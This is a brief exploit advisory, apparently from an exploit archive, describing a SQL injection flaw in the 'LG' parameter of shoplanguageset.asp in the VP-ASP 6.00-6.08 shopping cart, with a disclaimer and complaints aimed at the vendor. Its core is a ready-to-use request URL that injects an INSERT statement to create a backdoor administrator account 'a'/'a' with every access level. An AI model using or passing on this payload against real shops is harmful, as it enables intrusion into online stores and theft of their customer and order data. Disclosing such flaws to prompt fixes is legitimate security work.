vp-asp-new.txt

`VP-ASP 6.00-6.08? SQL Injection / Exploit by tracewar([email protected])  
  
I'm not responsible for any illegal actions  
taken by people using the information in this document, if you don't agree please stop reading  
and close this text document asap.  
  
* this information is for educational purposes only!  
  
* I didn't check this against the new 6.08 patch, but it's probably vulnerable too.  
  
OK for the guys at vp-asp,   
you should choose a different coding language for your shopping cart :(  
  
I'm tired of writing vp-asp advisories 24/7 untill you guys release version 7.00  
and take the security issue serious, I'm not going to audit your code anymore.  
  
----- THE BUG:  
  
the bug exists in the shoplanguageset.asp file under the "LG" query:  
I didn't have a normal vp-asp shopping cart for testings but this hack should work:  
  
add user a/a just like the old one:  
  
/shoplanguageset.asp?LG=English';insert into tbluser ("fldusername","fldpassword","fldaccess") values ('a','a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')--  
  
-tracewar`